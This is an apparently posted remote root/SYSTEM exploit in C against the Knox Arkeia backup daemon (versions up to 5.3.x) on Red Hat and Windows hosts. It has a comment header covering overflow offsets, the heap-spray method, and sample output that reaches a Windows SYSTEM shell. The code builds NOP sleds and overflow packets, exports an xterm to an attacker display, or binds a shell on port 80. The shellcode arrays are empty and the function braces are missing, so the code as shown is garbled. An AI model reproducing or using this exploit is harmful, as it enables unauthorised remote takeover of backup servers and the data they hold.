Knox Arkeia remote root/system exploit



0day cuz i'm bored

* Knox Arkeia Server Backup
* arkeiad local/remote root exploit
* Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE
* Works up to current version 5.3.x
* ---------------
* Linux x86:
* ./arksink2 <arkeia_host> <target_type> <display>
* Exports an xterm to the box of your choosing. Make sure to "xhost +" on
* the box you're exporting to.
* A stack overflow is in the processing of a type 77 request. EIP is actually
* overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we
* have to write past EIP and insert a "safe" value. Put this value behind your
* NOP+sc return address so it doesn't mess with the sled.
* Since the buffer is so small, we initially send an invalid packet that ends
* up on the heap a second before the overflow happens. If it is a high traffic
* Arkeia server the heap might be a bit volatile, so play around with putting
* nops+sc after the overwritten pointer. The heap method avoids non-exec stack
* protection, however.
* Includes targets for RH8 and RH7.2
* [user@host user]$ ./prog 1
* [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit
* [*] Attacking LINUX system
* [*] Exporting xterm to
* [*] Connected to NOP+shellcode socket
* [*] Connected to overflow socket
* [*] Sending nops+shellcode
* [*] Done, sleeping
* [*] Done, check for xterm
* ---------------
* Windows x86:
* ./prog <host> <target> <offset>
* Spawns a shell on port 80 of the remote host
* EIP is overwritten beginning with the 25th byte after the header. Since Windows
* is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to
* write an extra null past EIP. Another advantage here is that we can put all our
* nops and shellcode in the same packet, but after the NULL. They will not be copied
* onto the stack (and therefore not munge the pointer after it) but will remain
* in memory as a raw packet. Fire up ollydbg, search for your nops and voila.
* [user@host user]$ ./arksink2 3 0
* [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit
* [*] Attacking Windows system
* [*] Spawning shell on
* [*] Connected to overflow socket
* [*] Sending overflow
* [*] Attempting to get remote shell, try #0
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #1
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #2
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #3
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #4
* [*] Success, enjoy
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
* C:\WINNT\system32>whoami
* whoami
* C:\WINNT\system32>
* ---------------


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/nameser.h>

#define BUFLEN		10000		/* for readshell()		*/
#define DATA_LEN	1000		/* overflow packet data section	*/
#define HEAD_LEN 	8		/* overflow packet header	*/
#define NOP_LEN		20000		/* nop+shellcode packet 	*/
#define	ARK_PORT	617		/* port Arkeiad listens on	*/
#define SHELL_PORT	80		/* for the windows shellcode	*/
#define NOP 		0x90		/* Intel x86			*/
#define NUMTARGS	5		/* increase when adding targets */
#define LINUX		1		/* Linux target type		*/
#define WINDOWS		2		/* Windows target type		*/

struct {
	char 		*os;
	unsigned int	targret;
	unsigned int	targsafe;
	unsigned int	len;
	int		targtype;
} targets[] = {
	{ "Redhat 8.0", 0x80ecf90, 0x080e0144, 68, LINUX },
	{ "Redhat 7.2", 0x80eddc0, 0x080eb940, 68, LINUX },
	{ "Windows 2k SP2, SP3, SP4", 0x007d2144, 0xdeadbeef, 28, WINDOWS },
	{ "Windows 2003 EE", 0x007b2178, 0xdeadbeef, 28, WINDOWS },
	{ "Windows XP SP1", 0x007d20e7, 0xdeadbeef, 28, WINDOWS },

// Linux shellcode exports xterm
const char shellcode[] =

// Windows shellcode binds shell to port 80
const char shellcode_win[] =

unsigned int resolve(char *hostname)
	u_long 	ip = 0;
	struct hostent	*hoste;

	if ((int)(ip = inet_addr(hostname)) == -1)
		if ((hoste = gethostbyname(hostname)) == NULL)
			herror("[!] gethostbyname");
		memcpy(&ip, hoste->h_addr, hoste->h_length);

int isock(char *hostname, int portnum)
	struct sockaddr_in	sock_a;
	int			num, sock;
	unsigned int		ip;
	fd_set			input;

	sock_a.sin_family = AF_INET;
	sock_a.sin_port = htons(portnum);
	sock_a.sin_addr.s_addr = resolve(hostname);

	if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
		herror("[!] accept");
	if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))
		herror("[!] connect");

int usage(char *progname)
	int 	i;

	fprintf(stderr, "Usage:\n%s hostname target_num display  (attacking Linux)\n", progname);
	fprintf(stderr, "%s hostname target_num offset   (attacking Windows)\n", progname);
	for (i = 0; targets[i].os; i++)
		fprintf(stderr, "Target %d: %s\n", i+1, targets[i].os);
	fprintf(stderr, "Example: %s 1\n", progname);

int getshell(int sock)

	char	buf[BUFLEN];
	int	nread=0;

    		fd_set input; 

int lin(char *host, char *export, unsigned int tnum)

	char 		head[] 		= "\x00\x4d\x00\x03\x00\x01\xff\xff";
	char 		data[DATA_LEN];
	char		sc_req[NOP_LEN*2];
	char		*sc;
	unsigned int	retaddr;
	unsigned int	safe;
	int		datalen		= 0;
	int		port		= ARK_PORT;
	int		sock_overflow, sock_nops;
	int 		i;
	int		nullmap = 0;

	sock_overflow = sock_nops = 0;

	retaddr = targets[tnum].targret;
	safe = targets[tnum].targsafe;
	datalen = targets[tnum].len;

	sock_nops = isock(host, port);

	if (sock_nops < 1)
	fprintf(stderr, "[*] Connected to %s:%d NOP+shellcode socket\n", host, port);

	sock_overflow = isock(host, port);
	if (sock_overflow < 1)
	fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);

	// build data section of overflow packet
	memset(data, NOP, DATA_LEN);

	// copy in return address
	memcpy(data+datalen - 8, (char *)&retaddr, 4);
	// we overwrite a pointer that must be a valid address
	memcpy(data+datalen-4, (char *)&safe, 4); 

	datalen = ntohs(datalen);
	memcpy(head+6, (char *)&datalen, 2);

	// build invalid packet with nops+shellcode
	memset(sc_req, NOP, NOP_LEN+1);
	sc = (char *)malloc(strlen(shellcode) + strlen(export) + 2);
	sprintf(sc, "%s%s%s", shellcode, export, "K");
	if (strlen(sc) + NOP_LEN > NOP_LEN*2-1) 
		fprintf(stderr, "[!] display name too long\n");

	memcpy(sc_req+NOP_LEN, sc, strlen(sc));

	// send invalid nop+shellcode packet
	fprintf(stderr, "[*] Sending nops+shellcode\n");
	write(sock_nops, sc_req, NOP_LEN+strlen(sc)+1); 
	fprintf(stderr, "[*] Done, sleeping\n");

	// send overflow, pointing EIP to above nops+sc
	write(sock_overflow, head, HEAD_LEN);	// 8 byte header
	datalen = ntohs(datalen);
	fprintf(stderr, "[*] Sending overflow\n");
	write(sock_overflow, data, datalen);	// small overflow packet
	fprintf(stderr, "[*] Done, check for xterm\n");


void windows (char *host, int tnum, int offset)
	char 		head[] 		= "\x00\x4d\x00\x03\x00\x01\xff\xff";
	char 		data[DATA_LEN];
	char		sc_req[NOP_LEN*2];
	char		*sc;
	char		*export;
	unsigned int	ret;
	unsigned int	safeaddr;
	int		overflow_len;
	int		datasiz		= DATA_LEN;
	int		datalen		= 0;
	int		port		= ARK_PORT;
	int		sock_overflow, sock_nops, sock_shell;
	int 		i;

	datalen = targets[tnum].len;
	ret = targets[tnum].targret + offset;
	sock_overflow = isock(host, port);
	if (sock_overflow < 1)
	fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);

	// build data section of overflow packet
	memset(data, NOP, DATA_LEN);
	memcpy(data+datalen - 4, (char *)&ret, 4);
	memcpy(data+DATA_LEN-strlen(shellcode_win)-1, shellcode_win, strlen(shellcode_win));
	// put size into header
	datasiz = ntohs(datasiz);
	memcpy(head+6, (char *)&datasiz, 2);

	fprintf(stderr, "[*] Sending overflow\n");
	write(sock_overflow, head, HEAD_LEN);		// 8 byte header
	write(sock_overflow, data, DATA_LEN);		// large data section

	for (i = 0; i < 20; i++)
		fprintf(stderr, "[*] Attempting to get remote shell, try #%d\n", i);
		// connect to shell
		sock_shell = isock(host, SHELL_PORT);
		if (sock_shell > 0)
			fprintf(stderr, "[*] Success, enjoy\n");

	fprintf(stderr, "[!] Exploit failed or cannot connect to port 80\n");

int main( int argc, char **argv)

	/* first 2 bytes are a type 77 request */
	/* last two bytes length */
	char		*host;
	char		*export;
	unsigned int	tnum;
	int		datalen		= 0;
	int		offset		= 0;

	if (argc == 4)
		host = argv[1];
		tnum = atoi(argv[2]);

		if (targets[tnum].targtype == LINUX)
			export = argv[3];

		if (tnum > NUMTARGS || tnum == 0)
			fprintf(stderr, "[!] Invalid target\n");

	fprintf(stderr, "[*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit\n");
	fprintf(stderr, "[*] Attacking %s system\n", targets[tnum].os);

	if (targets[tnum].targtype == LINUX )
		fprintf(stderr, "[*] Exporting xterm to %s\n", export);
		lin(host, export, tnum);
	else if (targets[tnum].targtype == WINDOWS)
		fprintf(stderr, "[*] Spawning shell on %s:%d\n", host, SHELL_PORT);
		windows(host, tnum, offset);
		fprintf(stderr, "[!] Unknown target type: %d\n", targets[tnum].targtype);

